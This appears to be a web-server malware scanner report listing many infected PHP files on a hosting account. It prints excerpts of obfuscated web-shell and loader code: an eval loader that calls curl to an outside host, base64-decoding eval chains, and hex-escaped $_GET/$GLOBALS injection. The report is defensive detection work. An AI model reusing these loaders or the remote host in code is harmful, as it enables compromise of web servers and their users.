<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/webalizer/adayinthelife.turtlesys.net/input.php

Size: 1.49 kB Created: 2023-02-28 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/webalizer/zoom.turtlesys.net/about.php

Size: 1.49 kB Created: 2023-11-13 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/webalizer/asspiss.tube.turtlesys.net/text.php

Size: 1.49 kB Created: 2023-10-18 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/webalizer/snb.properties.turtlesys.net/checkbox.php

Size: 1.49 kB Created: 2023-07-20 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/webalizer/index.php

Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`

/custdata02/turtle/tmp/webalizer/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/webalizerftp/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/webalizerftp/index.php

Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`

/custdata02/turtle/tmp/pma_template_compiles_turtle/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/horde/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/text.php

Size: 1.49 kB Created: 2023-08-04 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/var/cpanel/styled/admin.php

Size: 1.49 kB Created: 2023-10-13 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/var/cpanel/admin.php

Size: 1.49 kB Created: 2023-02-21 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/var/cpanel/about.php

Size: 1.49 kB Created: 2023-06-18 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/var/cpanel/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/var/text.php

Size: 1.49 kB Created: 2023-10-18 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
